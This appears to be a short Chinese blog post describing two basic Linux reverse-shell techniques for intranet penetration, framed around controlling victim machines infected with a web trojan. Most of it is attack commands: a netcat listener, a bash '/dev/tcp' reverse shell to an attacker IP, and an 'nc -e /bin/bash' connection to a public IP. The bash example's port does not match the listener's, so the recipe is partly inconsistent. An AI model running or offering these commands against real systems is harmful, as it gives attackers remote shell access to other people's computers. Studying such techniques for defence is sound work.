美文网首页
两种基本的linux shell反弹方法

两种基本的linux shell反弹方法

作者: Do_a88d | 来源:发表于2019-12-25 09:54 被阅读0次

内网渗透必备,将权限反弹到互联网主机上

关于反弹shell的原因通常有这几种:

 1)某客户机中了你的网马,但是它在局域网内,你直接连接不了。

  2)它的ip会动态改变,你不能持续控制。

  3)由于防火墙等限制,对方机器只能发送请求,不能接收请求。

  4)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的

Shell 反弹工具nc  

A主机10.1.1.100 接受shell的主机

B主机10.1.1.101 发出shell的受害主机

方式1:利用主机b的bash反弹shell

A:nc –lvvp 1234

B: bash -i >& /dev/tcp/10.1.1.100/123 0>&1


方式2:两边都利用nc反弹

A:监听端口等待接受shell

nc –lvvp 1234

B: 将shell发送到远程服务器上

nc 106.13.230.211 1234 -t -e /bin/bash

在远程服务器上执行命令

学习更多的方法可以参考:https://klionsec.github.io/2016/09/27/revese-shell/

相关文章

网友评论

      本文标题:两种基本的linux shell反弹方法

      本文链接:https://www.haomeiwen.com/subject/ntnqoctx.html